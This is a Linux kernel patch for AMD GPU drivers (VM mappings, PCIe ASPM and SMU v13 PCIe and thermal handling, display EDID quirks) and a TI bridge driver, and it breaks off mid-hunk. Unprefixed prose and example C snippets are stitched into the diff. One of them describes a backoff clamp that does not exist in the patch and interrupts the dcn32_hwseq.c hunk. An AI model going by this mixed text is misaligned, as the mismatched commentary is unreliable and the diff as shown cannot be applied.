+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+index da01c1424b4ad..260e6a3316db0 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+@@ -2737,6 +2737,9 @@ int amdgpu_amdkfd_gpuvm_restore_process_bos(void *info, struct dma_fence **ef)
+ 			if (!attachment->is_mapped)
+ 				continue;
+ 
++			if (attachment->bo_va->base.bo->tbo.pin_count)
++				continue;
++
+ 			kfd_mem_dmaunmap_attachment(mem, attachment);
+ 			ret = update_gpuvm_pte(mem, attachment, &sync_obj);
+ 			if (ret) {
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
+index 58fe7279599f0..ec938a1a50621 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
+@@ -1668,18 +1668,30 @@ int amdgpu_vm_bo_clear_mappings(struct amdgpu_device *adev,
+ 
+ 	/* Insert partial mapping before the range */
+ 	if (!list_empty(&before->list)) {
++		struct amdgpu_bo *bo = before->bo_va->base.bo;
++
+ 		amdgpu_vm_it_insert(before, &vm->va);
+ 		if (before->flags & AMDGPU_PTE_PRT)
+ 			amdgpu_vm_prt_get(adev);
++
++		if (bo && bo->tbo.base.resv == vm->root.bo->tbo.base.resv &&
++		    !before->bo_va->base.moved)
++			amdgpu_vm_bo_moved(&before->bo_va->base);
+ 	} else {
+ 		kfree(before);
+ 	}
+ 
+ 	/* Insert partial mapping after the range */
+ 	if (!list_empty(&after->list)) {
++		struct amdgpu_bo *bo = after->bo_va->base.bo;
++
+ 		amdgpu_vm_it_insert(after, &vm->va);
+ 		if (after->flags & AMDGPU_PTE_PRT)
+ 			amdgpu_vm_prt_get(adev);
++
++		if (bo && bo->tbo.base.resv == vm->root.bo->tbo.base.resv &&
++		    !after->bo_va->base.moved)
++			amdgpu_vm_bo_moved(&after->bo_va->base);
+ 	} else {
+ 		kfree(after);
+ 	}
+diff --git a/drivers/gpu/drm/amd/amdgpu/nbio_v2_3.c b/drivers/gpu/drm/amd/amdgpu/nbio_v2_3.c
+index aa761ff3a5fae..7ba47fc1917b2 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nbio_v2_3.c
++++ b/drivers/gpu/drm/amd/amdgpu/nbio_v2_3.c
+@@ -346,7 +346,7 @@ static void nbio_v2_3_init_registers(struct amdgpu_device *adev)
+ 
+ #define NAVI10_PCIE__LC_L0S_INACTIVITY_DEFAULT		0x00000000 // off by default, no gains over L1
+ #define NAVI10_PCIE__LC_L1_INACTIVITY_DEFAULT		0x00000009 // 1=1us, 9=1ms
+-#define NAVI10_PCIE__LC_L1_INACTIVITY_TBT_DEFAULT	0x0000000E // 4ms
++#define NAVI10_PCIE__LC_L1_INACTIVITY_TBT_DEFAULT	0x0000000E // 400ms
+ 
+ static void nbio_v2_3_enable_aspm(struct amdgpu_device *adev,
+ 				  bool enable)
+@@ -479,9 +479,12 @@ static void nbio_v2_3_program_aspm(struct amdgpu_device *adev)
+ 		WREG32_SOC15(NBIO, 0, mmRCC_BIF_STRAP5, data);
+ 
+ 	def = data = RREG32_PCIE(smnPCIE_LC_CNTL);
+-	data &= ~PCIE_LC_CNTL__LC_L0S_INACTIVITY_MASK;
+-	data |= 0x9 << PCIE_LC_CNTL__LC_L1_INACTIVITY__SHIFT;
+-	data |= 0x1 << PCIE_LC_CNTL__LC_PMI_TO_L1_DIS__SHIFT;
++	data |= NAVI10_PCIE__LC_L0S_INACTIVITY_DEFAULT << PCIE_LC_CNTL__LC_L0S_INACTIVITY__SHIFT;
++	if (pci_is_thunderbolt_attached(adev->pdev))
++		data |= NAVI10_PCIE__LC_L1_INACTIVITY_TBT_DEFAULT  << PCIE_LC_CNTL__LC_L1_INACTIVITY__SHIFT;
++	else
++		data |= NAVI10_PCIE__LC_L1_INACTIVITY_DEFAULT << PCIE_LC_CNTL__LC_L1_INACTIVITY__SHIFT;
++	data &= ~PCIE_LC_CNTL__LC_PMI_TO_L1_DIS_MASK;
+ 	if (def != data)
+ 		WREG32_PCIE(smnPCIE_LC_CNTL, data);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c b/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
+index 5b251d0094678..97b033dfe9e45 100644
+--- a/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
+@@ -2330,7 +2330,7 @@ const struct amd_ip_funcs sdma_v4_0_ip_funcs = {
+ 
+ static const struct amdgpu_ring_funcs sdma_v4_0_ring_funcs = {
+ 	.type = AMDGPU_RING_TYPE_SDMA,
+-	.align_mask = 0xf,
++	.align_mask = 0xff,
+ 	.nop = SDMA_PKT_NOP_HEADER_OP(SDMA_OP_NOP),
+ 	.support_64bit_ptrs = true,
+ 	.secure_submission_supported = true,
+@@ -2400,7 +2400,7 @@ static const struct amdgpu_ring_funcs sdma_v4_0_ring_funcs_2nd_mmhub = {
+ 
+ static const struct amdgpu_ring_funcs sdma_v4_0_page_ring_funcs = {
+ 	.type = AMDGPU_RING_TYPE_SDMA,
+-	.align_mask = 0xf,
++	.align_mask = 0xff,
+ 	.nop = SDMA_PKT_NOP_HEADER_OP(SDMA_OP_NOP),
+ 	.support_64bit_ptrs = true,
+ 	.secure_submission_supported = true,
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 9be3769d68a85..b854eec2787e2 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -6972,7 +6972,13 @@ static int amdgpu_dm_connector_get_modes(struct drm_connector *connector)
+ 				drm_add_modes_noedid(connector, 640, 480);
+ 	} else {
+ 		amdgpu_dm_connector_ddc_get_modes(connector, edid);
+-		amdgpu_dm_connector_add_common_modes(encoder, connector);
++		/* most eDP supports only timings from its edid,
++		 * usually only detailed timings are available
++		 * from eDP edid. timings which are not from edid
++		 * may damage eDP
++		 */
++		if (connector->connector_type != DRM_MODE_CONNECTOR_eDP)
++			amdgpu_dm_connector_add_common_modes(encoder, connector);
+ 		amdgpu_dm_connector_add_freesync_modes(connector, edid);
+ 	}
+ 	amdgpu_dm_fbc_init(connector);
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+index 0329e548134b2..db7744beed5fd 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+@@ -42,6 +42,30 @@
+ #include "dm_helpers.h"
+ #include "ddc_service_types.h"
+ 
++static u32 edid_extract_panel_id(struct edid *edid)
++{
++	return (u32)edid->mfg_id[0] << 24   |
++	       (u32)edid->mfg_id[1] << 16   |
++	       (u32)EDID_PRODUCT_ID(edid);
++}
++
++static void apply_edid_quirks(struct edid *edid, struct dc_edid_caps *edid_caps)
++{
++	uint32_t panel_id = edid_extract_panel_id(edid);
++
++	switch (panel_id) {
++	/* Workaround for some monitors that do not work well with FAMS */
++	case drm_edid_encode_panel_id('S', 'A', 'M', 0x0E5E):
++	case drm_edid_encode_panel_id('S', 'A', 'M', 0x7053):
++	case drm_edid_encode_panel_id('S', 'A', 'M', 0x71AC):
++		DRM_DEBUG_DRIVER("Disabling FAMS on monitor with panel id %X\n", panel_id);
++		edid_caps->panel_patch.disable_fams = true;
++		break;
++	default:
++		return;
++	}
++}
++
+ /* dm_helpers_parse_edid_caps
+  *
+  * Parse edid caps
+@@ -113,6 +137,8 @@ enum dc_edid_status dm_helpers_parse_edid_caps(
+ 	else
+ 		edid_caps->speaker_flags = DEFAULT_SPEAKER_LOCATION;
+ 
++	apply_edid_quirks(edid_buf, edid_caps);
++
+ 	kfree(sads);
+ 	kfree(sadb);
+ 
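For readers tracing the quirk keys above: edid_extract_panel_id() packs the two EDID manufacturer-ID bytes and the 16-bit product code into one u32, the same layout drm_edid_encode_panel_id() produces. A standalone userspace sketch of that packing (values illustrative, not part of the patch):

#include <stdint.h>
#include <stdio.h>

/* Pack the two EDID mfg-id bytes and the 16-bit product code the way
 * the quirk-table keys do: byte0 << 24 | byte1 << 16 | product. */
static uint32_t panel_id(uint8_t m0, uint8_t m1, uint16_t product)
{
	return ((uint32_t)m0 << 24) | ((uint32_t)m1 << 16) | product;
}

int main(void)
{
	/* EDID compresses "SAM" into two bytes (0x4C, 0x2D); the product
	 * code 0x0E5E matches one of the quirked panels above. */
	printf("0x%08X\n", panel_id(0x4C, 0x2D, 0x0E5E)); /* 0x4C2D0E5E */
	return 0;
}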
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index b405f2e86927d..cca0143444164 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -1539,6 +1539,9 @@ bool dc_validate_boot_timing(const struct dc *dc,
+ 		return false;
+ 	}
+ 
++	if (dc->debug.force_odm_combine)
++		return false;
++
+ 	/* Check for enabled DIG to identify enabled display */
+ 	if (!link->link_enc->funcs->is_dig_enabled(link->link_enc))
+ 		return false;
+diff --git a/drivers/gpu/drm/amd/display/dc/dce112/dce112_resource.c b/drivers/gpu/drm/amd/display/dc/dce112/dce112_resource.c
+index e179e80667d1c..19d7cfa53211b 100644
+--- a/drivers/gpu/drm/amd/display/dc/dce112/dce112_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dce112/dce112_resource.c
+@@ -970,10 +970,12 @@ enum dc_status resource_map_phy_clock_resources(
+ 		|| dc_is_virtual_signal(pipe_ctx->stream->signal))
+ 		pipe_ctx->clock_source =
+ 				dc->res_pool->dp_clock_source;
+-	else
+-		pipe_ctx->clock_source = find_matching_pll(
+-			&context->res_ctx, dc->res_pool,
+-			stream);
++	else {
++		if (stream && stream->link && stream->link->link_enc)
++			pipe_ctx->clock_source = find_matching_pll(
++				&context->res_ctx, dc->res_pool,
++				stream);
++	}
+ 
+ 	if (pipe_ctx->clock_source == NULL)
+ 		return DC_NO_CLOCK_SOURCE_RESOURCE;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+index 2d49e99a152c4..622efa556e7ad 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+@@ -1678,6 +1678,17 @@ static void dcn20_program_pipe(
+ 
+ 		if (hws->funcs.setup_vupdate_interrupt)
+ 			hws->funcs.setup_vupdate_interrupt(dc, pipe_ctx);
++
++		if (hws->funcs.calculate_dccg_k1_k2_values && dc->res_pool->dccg->funcs->set_pixel_rate_div) {
++			unsigned int k1_div, k2_div;
++
++			hws->funcs.calculate_dccg_k1_k2_values(pipe_ctx, &k1_div, &k2_div);
++
++			dc->res_pool->dccg->funcs->set_pixel_rate_div(
++				dc->res_pool->dccg,
++				pipe_ctx->stream_res.tg->inst,
++				k1_div, k2_div);
++		}
+ 	}
+ 
+ 	if (pipe_ctx->update_flags.bits.odm)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+index 2f4afe40f3e68..f5fa7abd97fc7 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
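The new clamp guards the `1U << exp` on the following line: without it a large enough retry exponent makes the shift undefined. A minimal userspace sketch of the clamped backoff, with constants mirroring the driver's (illustrative only):

#include <stdint.h>
#include <stdio.h>

#define MAX_BACKOFF_EXP 16U
#define MIN_POLL_US     100U
#define MAX_POLL_US     5000U

static uint32_t backoff_us(uint32_t exp, uint32_t delay_us)
{
	if (exp > MAX_BACKOFF_EXP)        /* keep the shift well-defined */
		exp = MAX_BACKOFF_EXP;
	if (delay_us < MIN_POLL_US)
		delay_us = MIN_POLL_US;
	uint64_t d = (uint64_t)delay_us << exp; /* widen to avoid overflow */
	return d > MAX_POLL_US ? MAX_POLL_US : (uint32_t)d;
}

int main(void)
{
	/* prints "800 5000": the second call saturates at the cap */
	printf("%u %u\n", backoff_us(3, 100), backoff_us(40, 100));
	return 0;
}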
+@@ -1165,10 +1165,6 @@ unsigned int dcn32_calculate_dccg_k1_k2_values(struct pipe_ctx *pipe_ctx, unsign
+ 	unsigned int odm_combine_factor = 0;
+ 	bool two_pix_per_container = false;
+ 
+-	// For phantom pipes, use the same programming as the main pipes
+-	if (pipe_ctx->stream->mall_stream_config.type == SUBVP_PHANTOM) {
+-		stream = pipe_ctx->stream->mall_stream_config.paired_stream;
+-	}
+ 	two_pix_per_container = optc2_is_two_pixels_per_containter(&stream->timing);
+ 	odm_combine_factor = get_odm_config(pipe_ctx, NULL);
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.c
+index 2b33eeb213e2a..fe941b103de81 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.c
+@@ -98,7 +98,7 @@ static void optc32_set_odm_combine(struct timing_generator *optc, int *opp_id, i
+ 	optc1->opp_count = opp_cnt;
+ }
+ 
+-static void optc32_set_h_timing_div_manual_mode(struct timing_generator *optc, bool manual_mode)
++void optc32_set_h_timing_div_manual_mode(struct timing_generator *optc, bool manual_mode)
+ {
+ 	struct optc *optc1 = DCN10TG_FROM_TG(optc);
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.h b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.h
+index 5e57c39235fab..e5c5343e56404 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.h
+@@ -250,5 +250,6 @@
+ 	SF(OTG0_OTG_DRR_CONTROL, OTG_V_TOTAL_LAST_USED_BY_DRR, mask_sh)
+ 
+ void dcn32_timing_generator_init(struct optc *optc1);
++void optc32_set_h_timing_div_manual_mode(struct timing_generator *optc, bool manual_mode);
+ 
+ #endif /* __DC_OPTC_DCN32_H__ */
+diff --git a/drivers/gpu/drm/amd/display/dmub/dmub_srv.h b/drivers/gpu/drm/amd/display/dmub/dmub_srv.h
+index eb5b7eb292ef3..b53468aca4a9b 100644
+--- a/drivers/gpu/drm/amd/display/dmub/dmub_srv.h
++++ b/drivers/gpu/drm/amd/display/dmub/dmub_srv.h
+@@ -471,7 +471,7 @@ struct dmub_notification {
+  * of a firmware to know if feature or functionality is supported or present.
+  */
+ #define DMUB_FW_VERSION(major, minor, revision) \
+-	((((major) & 0xFF) << 24) | (((minor) & 0xFF) << 16) | ((revision) & 0xFFFF))
++	((((major) & 0xFF) << 24) | (((minor) & 0xFF) << 16) | (((revision) & 0xFF) << 8))
+ 
+ /**
+  * dmub_srv_create() - creates the DMUB service.
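For readers decoding the constant: the corrected macro gives each version component its own byte, with the revision at bits 15:8 instead of a 16-bit field at bits 15:0. A standalone sketch of the packing (illustrative only):

#include <stdint.h>
#include <stdio.h>

/* major in bits 31:24, minor in bits 23:16, revision in bits 15:8,
 * matching the corrected DMUB_FW_VERSION() layout above. */
static uint32_t fw_version(uint32_t major, uint32_t minor, uint32_t rev)
{
	return ((major & 0xFF) << 24) | ((minor & 0xFF) << 16) |
	       ((rev & 0xFF) << 8);
}

int main(void)
{
	printf("0x%08X\n", fw_version(2, 7, 11)); /* 0x02070B00 */
	return 0;
}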
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h b/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h
+index 44bbf17e4bef1..3bc4128a22ac2 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h
+@@ -168,6 +168,7 @@ struct smu_temperature_range {
+ 	int mem_crit_max;
+ 	int mem_emergency_max;
+ 	int software_shutdown_temp;
++	int software_shutdown_temp_offset;
+ };
+ 
+ struct smu_state_validation_block {
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+index bffa6247c3cda..d6479a8088554 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+@@ -297,5 +297,9 @@ int smu_v13_0_get_pptable_from_firmware(struct smu_context *smu,
+ 					uint32_t *size,
+ 					uint32_t pptable_id);
+ 
++int smu_v13_0_update_pcie_parameters(struct smu_context *smu,
++				     uint32_t pcie_gen_cap,
++				     uint32_t pcie_width_cap);
++
+ #endif
+ #endif
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+index 5143b4df2cc14..2456f2a72defc 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+@@ -1381,6 +1381,7 @@ static int smu_v13_0_irq_process(struct amdgpu_device *adev,
+ 	 */
+ 	uint32_t ctxid = entry->src_data[0];
+ 	uint32_t data;
++	uint32_t high;
+ 
+ 	if (client_id == SOC15_IH_CLIENTID_THM) {
+ 		switch (src_id) {
+@@ -1437,6 +1438,36 @@ static int smu_v13_0_irq_process(struct amdgpu_device *adev,
+ 					schedule_work(&smu->throttling_logging_work);
+ 
+ 				break;
++			case 0x8:
++				high = smu->thermal_range.software_shutdown_temp +
++					smu->thermal_range.software_shutdown_temp_offset;
++				high = min_t(typeof(high),
++					     SMU_THERMAL_MAXIMUM_ALERT_TEMP,
++					     high);
++				dev_emerg(adev->dev, "Reduce soft CTF limit to %d (by an offset %d)\n",
++							high,
++							smu->thermal_range.software_shutdown_temp_offset);
++
++				data = RREG32_SOC15(THM, 0, regTHM_THERMAL_INT_CTRL);
++				data = REG_SET_FIELD(data, THM_THERMAL_INT_CTRL,
++							DIG_THERM_INTH,
++							(high & 0xff));
++				data = data & (~THM_THERMAL_INT_CTRL__THERM_TRIGGER_MASK_MASK);
++				WREG32_SOC15(THM, 0, regTHM_THERMAL_INT_CTRL, data);
++				break;
++			case 0x9:
++				high = min_t(typeof(high),
++					     SMU_THERMAL_MAXIMUM_ALERT_TEMP,
++					     smu->thermal_range.software_shutdown_temp);
++				dev_emerg(adev->dev, "Recover soft CTF limit to %d\n", high);
++
++				data = RREG32_SOC15(THM, 0, regTHM_THERMAL_INT_CTRL);
++				data = REG_SET_FIELD(data, THM_THERMAL_INT_CTRL,
++							DIG_THERM_INTH,
++							(high & 0xff));
++				data = data & (~THM_THERMAL_INT_CTRL__THERM_TRIGGER_MASK_MASK);
++				WREG32_SOC15(THM, 0, regTHM_THERMAL_INT_CTRL, data);
++				break;
+ 			}
+ 		}
+ 	}
+@@ -2458,3 +2489,70 @@ int smu_v13_0_mode1_reset(struct smu_context *smu)
+ 
+ 	return ret;
+ }
++
++/*
++ * Intel hosts such as Raptor Lake and Sapphire Rapids don't support dynamic
++ * speed switching. Until we have confirmation from Intel that a specific host
++ * supports it, it's safer that we keep it disabled for all.
++ *
++ * https://edc.intel.com/content/www/us/en/design/products/platforms/details/raptor-lake-s/13th-generation-core-processors-datasheet-volume-1-of-2/005/pci-express-support/
++ * https://gitlab.freedesktop.org/drm/amd/-/issues/2663
++ */
++static bool smu_v13_0_is_pcie_dynamic_switching_supported(void)
++{
++#if IS_ENABLED(CONFIG_X86)
++	struct cpuinfo_x86 *c = &cpu_data(0);
++
++	if (c->x86_vendor == X86_VENDOR_INTEL)
++		return false;
++#endif
++	return true;
++}
++
++int smu_v13_0_update_pcie_parameters(struct smu_context *smu,
++				     uint32_t pcie_gen_cap,
++				     uint32_t pcie_width_cap)
++{
++	struct smu_13_0_dpm_context *dpm_context = smu->smu_dpm.dpm_context;
++	struct smu_13_0_pcie_table *pcie_table =
++				&dpm_context->dpm_tables.pcie_table;
++	int num_of_levels = pcie_table->num_of_link_levels;
++	uint32_t smu_pcie_arg;
++	int ret, i;
++
++	if (!smu_v13_0_is_pcie_dynamic_switching_supported()) {
++		if (pcie_table->pcie_gen[num_of_levels - 1] < pcie_gen_cap)
++			pcie_gen_cap = pcie_table->pcie_gen[num_of_levels - 1];
++
++		if (pcie_table->pcie_lane[num_of_levels - 1] < pcie_width_cap)
++			pcie_width_cap = pcie_table->pcie_lane[num_of_levels - 1];
++
++		/* Force all levels to use the same settings */
++		for (i = 0; i < num_of_levels; i++) {
++			pcie_table->pcie_gen[i] = pcie_gen_cap;
++			pcie_table->pcie_lane[i] = pcie_width_cap;
++		}
++	} else {
++		for (i = 0; i < num_of_levels; i++) {
++			if (pcie_table->pcie_gen[i] > pcie_gen_cap)
++				pcie_table->pcie_gen[i] = pcie_gen_cap;
++			if (pcie_table->pcie_lane[i] > pcie_width_cap)
++				pcie_table->pcie_lane[i] = pcie_width_cap;
++		}
++	}
++
++	for (i = 0; i < num_of_levels; i++) {
++		smu_pcie_arg = i << 16;
++		smu_pcie_arg |= pcie_table->pcie_gen[i] << 8;
++		smu_pcie_arg |= pcie_table->pcie_lane[i];
++
++		ret = smu_cmn_send_smc_msg_with_param(smu,
++						      SMU_MSG_OverridePcieParameters,
++						      smu_pcie_arg,
++						      NULL);
++		if (ret)
++			return ret;
++	}
++
++	return 0;
++}
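The message argument built in the final loop packs three fields into one u32: the DPM level index above bit 16, the PCIe generation code in bits 15:8 and the lane-width code in bits 7:0. A standalone sketch (the example field values are illustrative):

#include <stdint.h>
#include <stdio.h>

static uint32_t smu_pcie_arg(uint32_t level, uint32_t gen, uint32_t lanes)
{
	return (level << 16) | (gen << 8) | lanes; /* level | gen | width */
}

int main(void)
{
	/* level 1, gen code 3, lane-width code 6 */
	printf("0x%08X\n", smu_pcie_arg(1, 3, 6)); /* 0x00010306 */
	return 0;
}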
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+index 54fc42dad7755..f7ac488a3da20 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+@@ -1216,37 +1216,6 @@ static int smu_v13_0_0_force_clk_levels(struct smu_context *smu,
+ 	return ret;
+ }
+ 
+-static int smu_v13_0_0_update_pcie_parameters(struct smu_context *smu,
+-					      uint32_t pcie_gen_cap,
+-					      uint32_t pcie_width_cap)
+-{
+-	struct smu_13_0_dpm_context *dpm_context = smu->smu_dpm.dpm_context;
+-	struct smu_13_0_pcie_table *pcie_table =
+-				&dpm_context->dpm_tables.pcie_table;
+-	uint32_t smu_pcie_arg;
+-	int ret, i;
+-
+-	for (i = 0; i < pcie_table->num_of_link_levels; i++) {
+-		if (pcie_table->pcie_gen[i] > pcie_gen_cap)
+-			pcie_table->pcie_gen[i] = pcie_gen_cap;
+-		if (pcie_table->pcie_lane[i] > pcie_width_cap)
+-			pcie_table->pcie_lane[i] = pcie_width_cap;
+-
+-		smu_pcie_arg = i << 16;
+-		smu_pcie_arg |= pcie_table->pcie_gen[i] << 8;
+-		smu_pcie_arg |= pcie_table->pcie_lane[i];
+-
+-		ret = smu_cmn_send_smc_msg_with_param(smu,
+-						      SMU_MSG_OverridePcieParameters,
+-						      smu_pcie_arg,
+-						      NULL);
+-		if (ret)
+-			return ret;
+-	}
+-
+-	return 0;
+-}
+-
+ static const struct smu_temperature_range smu13_thermal_policy[] = {
+ 	{-273150,  99000, 99000, -273150, 99000, 99000, -273150, 99000, 99000},
+ 	{ 120000, 120000, 120000, 120000, 120000, 120000, 120000, 120000, 120000},
+@@ -1281,6 +1250,7 @@ static int smu_v13_0_0_get_thermal_temperature_range(struct smu_context *smu,
+ 	range->mem_emergency_max = (pptable->SkuTable.TemperatureLimit[TEMP_MEM] + CTF_OFFSET_MEM)*
+ 		SMU_TEMPERATURE_UNITS_PER_CENTIGRADES;
+ 	range->software_shutdown_temp = powerplay_table->software_shutdown_temp;
++	range->software_shutdown_temp_offset = pptable->SkuTable.FanAbnormalTempLimitOffset;
+ 
+ 	return 0;
+ }
+@@ -2032,7 +2002,7 @@ static const struct pptable_funcs smu_v13_0_0_ppt_funcs = {
+ 	.feature_is_enabled = smu_cmn_feature_is_enabled,
+ 	.print_clk_levels = smu_v13_0_0_print_clk_levels,
+ 	.force_clk_levels = smu_v13_0_0_force_clk_levels,
+-	.update_pcie_parameters = smu_v13_0_0_update_pcie_parameters,
++	.update_pcie_parameters = smu_v13_0_update_pcie_parameters,
+ 	.get_thermal_temperature_range = smu_v13_0_0_get_thermal_temperature_range,
+ 	.register_irq_handler = smu_v13_0_register_irq_handler,
+ 	.enable_thermal_alert = smu_v13_0_enable_thermal_alert,
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+index bd61518bb7b12..d980eff2b6166 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+@@ -1225,37 +1225,6 @@ static int smu_v13_0_7_force_clk_levels(struct smu_context *smu,
+ 	return ret;
+ }
+ 
+-static int smu_v13_0_7_update_pcie_parameters(struct smu_context *smu,
+-					      uint32_t pcie_gen_cap,
+-					      uint32_t pcie_width_cap)
+-{
+-	struct smu_13_0_dpm_context *dpm_context = smu->smu_dpm.dpm_context;
+-	struct smu_13_0_pcie_table *pcie_table =
+-				&dpm_context->dpm_tables.pcie_table;
+-	uint32_t smu_pcie_arg;
+-	int ret, i;
+-
+-	for (i = 0; i < pcie_table->num_of_link_levels; i++) {
+-		if (pcie_table->pcie_gen[i] > pcie_gen_cap)
+-			pcie_table->pcie_gen[i] = pcie_gen_cap;
+-		if (pcie_table->pcie_lane[i] > pcie_width_cap)
+-			pcie_table->pcie_lane[i] = pcie_width_cap;
+-
+-		smu_pcie_arg = i << 16;
+-		smu_pcie_arg |= pcie_table->pcie_gen[i] << 8;
+-		smu_pcie_arg |= pcie_table->pcie_lane[i];
+-
+-		ret = smu_cmn_send_smc_msg_with_param(smu,
+-						      SMU_MSG_OverridePcieParameters,
+-						      smu_pcie_arg,
+-						      NULL);
+-		if (ret)
+-			return ret;
+-	}
+-
+-	return 0;
+-}
+-
+ static const struct smu_temperature_range smu13_thermal_policy[] =
+ {
+ 	{-273150,  99000, 99000, -273150, 99000, 99000, -273150, 99000, 99000},
+@@ -1288,6 +1257,7 @@ static int smu_v13_0_7_get_thermal_temperature_range(struct smu_context *smu,
+ 	range->mem_emergency_max = (pptable->SkuTable.TemperatureLimit[TEMP_MEM] + CTF_OFFSET_MEM)*
+ 		SMU_TEMPERATURE_UNITS_PER_CENTIGRADES;
+ 	range->software_shutdown_temp = powerplay_table->software_shutdown_temp;
++	range->software_shutdown_temp_offset = pptable->SkuTable.FanAbnormalTempLimitOffset;
+ 
+ 	return 0;
+ }
+@@ -1749,7 +1719,7 @@ static const struct pptable_funcs smu_v13_0_7_ppt_funcs = {
+ 	.feature_is_enabled = smu_cmn_feature_is_enabled,
+ 	.print_clk_levels = smu_v13_0_7_print_clk_levels,
+ 	.force_clk_levels = smu_v13_0_7_force_clk_levels,
+-	.update_pcie_parameters = smu_v13_0_7_update_pcie_parameters,
++	.update_pcie_parameters = smu_v13_0_update_pcie_parameters,
+ 	.get_thermal_temperature_range = smu_v13_0_7_get_thermal_temperature_range,
+ 	.register_irq_handler = smu_v13_0_register_irq_handler,
+ 	.enable_thermal_alert = smu_v13_0_enable_thermal_alert,
+diff --git a/drivers/gpu/drm/bridge/ti-sn65dsi86.c b/drivers/gpu/drm/bridge/ti-sn65dsi86.c
+index d16775c973c4e..b89f7f7ca1885 100644
+--- a/drivers/gpu/drm/bridge/ti-sn65dsi86.c
++++ b/drivers/gpu/drm/bridge/ti-sn65dsi86.c
+@@ -170,10 +170,10 @@
+  * @pwm_refclk_freq: Cache for the reference clock input to the PWM.
+  */
+ struct ti_sn65dsi86 {
+-	struct auxiliary_device		bridge_aux;
+-	struct auxiliary_device		gpio_aux;
+-	struct auxiliary_device		aux_aux;
+-	struct auxiliary_device		pwm_aux;
++	struct auxiliary_device		*bridge_aux;
++	struct auxiliary_device		*gpio_aux;
++	struct auxiliary_device		*aux_aux;
++	struct auxiliary_device		*pwm_aux;
+ 
+ 	struct device			*dev;
+ 	struct regmap			*regmap;
+@@ -468,27 +468,34 @@ static void ti_sn65dsi86_delete_aux(void *data)
